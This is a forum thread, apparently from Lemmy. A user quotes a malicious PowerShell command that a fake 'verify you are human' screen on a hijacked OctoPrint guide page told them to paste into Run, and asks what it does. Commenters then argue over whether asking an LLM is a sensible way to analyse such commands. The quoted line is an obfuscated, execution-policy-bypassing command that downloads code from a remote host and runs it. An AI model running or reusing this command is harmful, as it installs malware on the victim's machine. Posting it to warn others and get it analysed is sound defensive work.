Yeah don’t put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run
conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1
One of the moments that Ai can be good. I asked googled gemni
Edit:added back tick to urls
Could you surround the links with backticks to make them code blocks? That would prevent someone from accidentally clicking it
Doesn’t really matter if anyone clicks it, you would need to execute the script to be compromised.
Sure, thanks for the heads up
You needed an LLM to figure out this was malware?! Sweet jesus, we’re well and truly fucked.
Right? Tech literacy is dead and smartphones killed it
deleted by creator
It did speed up the process of looking it up and confirming that it is malware.
LLMs are decent at pattern recognition, and so it pulled up relevant keywords associated with each part of the command. You can then look up the important section to verify. It’s also something that a simple and locally hosted LLM could do.
I wouldn’t run a random command, but confirming that it is malware would let me take further action to block the site / report it / help a family member that already ran the command
Or you can just know that if some rando site is asking you to run cmd and powershell as some sort of authentication scheme, you’re about to get your shit fucked up. The specifics literally don’t matter, this is behavior no legit site would request you to do.
That’s enough for me to not run it, but proving it can be helpful in some contexts, such as this thread.
“This is malware because no legit site would authenticate like that” vs. “this is malware, it will do XYZ”
Okay but pretty much any malware is going to follow those same steps - they’re what makes it malware. The LLM doesn’t “prove” anything - it’s not examining the executable, it’s not setting up a VM and doing deep packet analysis to see how the malware operates. It’s just parroting back the fact this is malware with details seeded from the prompt. This is like yelling into a canyon and “proving” someone is stuck in the canyon and yelling because you heard an echo.
No one should be using an LLM as a security backstop. It’s only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn’t malware because it hasn’t seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.
That’s not what I meant though, I said that it speeds up the process of looking it up. It’s about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.
It is similar to a web search, but with how bad search results are these days (a large part because of other people making LLM generated garbage articles), I find that asking a locally hosted LLM will give me a better starting point. Since it’s running on my own simple hardware, I’m not as worried about the resource cost compared to the tech companies’ ones.
I agree with everything else you’ve said though
Chill out you, we all know it was malware, but llms are actually a tool in this use case to find out more about it without executing the code.
I don’t like AI anymore than the next guy but this is just a silly response
Fucking priceless. The LLM didn’t explain anything beyond what was obvious from just looking at it. It was trying to get you to run a privileged executable. The LLM doesn’t have a clue what the executable does, and even admits that. So why bother asking it?
Let’s take the tech out of it. You’re at a restaurant and you’re given a beverage in a glass, but you can see the glass is dirty with food residue. Do you have to consult an LLM to know not to drink out of it? Does it matter what sort of food residue it is? Of course not.
I swear people’s critical thinking skills are non-existent or in complete atrophy these days. The only thing of potential interest is the executable itself and if you’re posting this question, I’m not sure any explanation or details would mean anything to you.
Yeah but the LLM isn’t the one making a scene
<clutches pearls> Making a scene?! Oh no! Have I shattered the fragile Lemmy decorum with my boorish behavior? How dreadful!
Listen, if you want to believe an LLM has anything useful to say about the malware you’re presented with on dodgy sites, go for it.
And I’ll be free to think you’re a prime example for why we should start requiring a “drivers license” to get on a computer. To each their own.
Alright buddy
Not everyone can understand that it runs a privileged executable.
If it’s malware, it - by definition - is going to need to run a privileged executable. That’s the “ware” in “malware”. The LLM is just explaining the specific method they’re attempting to use - which again should be obvious both by the nature of the actions it’s requesting from the user as well as the specific text it’s asking to be run. It explicitly says it doesn’t know anything about the executable that’s being run, so it really isn’t offering anything particularly useful or actionable - just wasting resources.